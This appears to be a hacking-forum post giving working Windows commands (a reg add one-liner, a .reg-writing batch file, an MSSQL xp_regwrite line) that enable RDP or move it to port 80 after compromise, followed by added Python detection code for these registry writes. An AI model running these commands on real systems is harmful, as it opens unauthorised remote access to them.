黑帽联盟

Title: How to open the remote port once you have a shell

Author: 定位    Time: 2016-10-13 04:11
It depends on what system it is.
For 2000, you have to upload 3389.exe and run it.

For 2003 there are many more methods; you can enable 3389 with a one-liner:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f

3389.bat (enables 3389):
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg

One-liner to enable 3389 over 1433 (MSSQL):
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
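From the defender's side, every technique in the post above leaves the same trace: a registry SetValue on a handful of Terminal Server, TermService/TermDD or RDP-Tcp values, written by reg.exe, regedit.exe (the .reg import) or sqlservr.exe (the xp_regwrite route). The following is an added detection example, not code from the post or the forum. It runs over constructed sample events in a simplified key=value rendering of Sysmon Event ID 13 (RegistryEvent SetValue); the field names EventType, Image, TargetObject and Details are Sysmon's own, the '|'-separated line format and the list of "unusual writer" process names are assumptions for the example.

```python
"""Flag registry writes that enable RDP or move its listener port.

Added detection example (not from the post). Input is a constructed,
simplified rendering of Sysmon Event ID 13 (RegistryEvent SetValue) as
key=value fields separated by '|'; real events are XML/EVTX.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Registry values named in the post, matched as case-insensitive suffixes of
# the Sysmon TargetObject path (the hive prefix varies, so only the tail counts).
WATCHED_VALUES = {
    r"\control\terminal server\fdenytsconnections": "fDenyTSConnections",
    r"\control\terminal server\tsenabled": "TSEnabled",
    r"\control\terminal server\winstations\rdp-tcp\portnumber": "RDP-Tcp PortNumber",
    r"\control\terminal server\wds\rdpwd\tds\tcp\portnumber": "rdpwd tcp PortNumber",
    r"\services\termservice\start": "TermService start type",
    r"\services\termdd\start": "TermDD start type",
    r"\policies\microsoft\windows\installer\enableadmintsremote": "EnableAdminTSRemote",
}

# Writers that are unusual for these values outside planned admin work
# (assumption; tune per environment). sqlservr.exe covers xp_regwrite,
# reg.exe / regedit.exe cover "reg add" and the .reg import.
SUSPICIOUS_IMAGES = {"reg.exe", "regedit.exe", "sqlservr.exe", "cmd.exe", "powershell.exe"}

RDP_DEFAULT_PORT = 3389


@dataclass
class Finding:
    image: str
    target: str
    value: Optional[int]
    note: str
    severity: str


def parse_line(line: str) -> dict:
    """Split 'k=v|k=v' into a dict; a field without '=' gets an empty value."""
    rec = {}
    for field in line.split("|"):
        key, _, val = field.partition("=")
        rec[key.strip()] = val.strip()
    return rec


def parse_details_dword(details: str) -> Optional[int]:
    """Sysmon renders DWORD data as 'DWORD (0x00000050)'; return it as an int."""
    m = re.search(r"DWORD\s*\(0x([0-9A-Fa-f]+)\)", details)
    return int(m.group(1), 16) if m else None


def analyze(line: str) -> Optional[Finding]:
    """Return a Finding for a SetValue on a watched RDP value, else None."""
    rec = parse_line(line)
    if rec.get("EventType") != "SetValue":
        return None
    target = rec.get("TargetObject", "")
    lowered = target.lower()
    for suffix, label in WATCHED_VALUES.items():
        if not lowered.endswith(suffix):
            continue
        value = parse_details_dword(rec.get("Details", ""))
        if suffix.endswith("portnumber"):
            # The post moves RDP to port 80; any non-default port is worth a look.
            if value is not None and value != RDP_DEFAULT_PORT:
                note = f"RDP listener moved from {RDP_DEFAULT_PORT} to port {value}"
            else:
                note = f"{label} rewritten"
        elif suffix.endswith("fdenytsconnections"):
            note = ("incoming RDP connections enabled (fDenyTSConnections=0)"
                    if value == 0 else "incoming RDP connections denied")
        elif suffix.endswith("tsenabled"):
            note = "Terminal Services enabled (TSEnabled=1)" if value == 1 else f"{label} rewritten"
        else:
            note = f"{label} written (value={value})"
        image = rec.get("Image", "").rsplit("\\", 1)[-1].lower()
        severity = "high" if image in SUSPICIOUS_IMAGES else "medium"
        return Finding(image, target, value, note, severity)
    return None


def scan(lines):
    """Run analyze() over a sequence of event lines and keep the hits."""
    return [f for f in map(analyze, lines) if f is not None]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    r"EventType=SetValue|Image=C:\Windows\System32\reg.exe|TargetObject=HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber|Details=DWORD (0x00000050)",
    r"EventType=SetValue|Image=C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe|TargetObject=HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections|Details=DWORD (0x00000000)",
    r"EventType=SetValue|Image=C:\Windows\System32\svchost.exe|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater|Details=C:\Tools\updater.exe",
    r"EventType=CreateKey|Image=C:\Windows\System32\svchost.exe|TargetObject=HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp",
    r"EventType=SetValue|Image=C:\Windows\regedit.exe|TargetObject=HKLM\SYSTEM\CurrentControlSet\Services\TermService\Start|Details=DWORD (0x00000002)",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.image}: {f.note}  <- {f.target}")
```

Matching on the path tail rather than the full hive string keeps the rule working whether the event was logged under HKLM or the \REGISTRY\MACHINE form, and the port check is deliberately "anything but 3389" because a listener moved to 80 or 443 is the variant the post actually describes. Pair the alert with the process ancestry of the writer: a w3wp.exe or sqlservr.exe parent behind reg.exe is far stronger evidence than the registry write alone.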

Welcome to 黑帽联盟 (https://bbs.cnblackhat.com/) Powered by Discuz! X2.5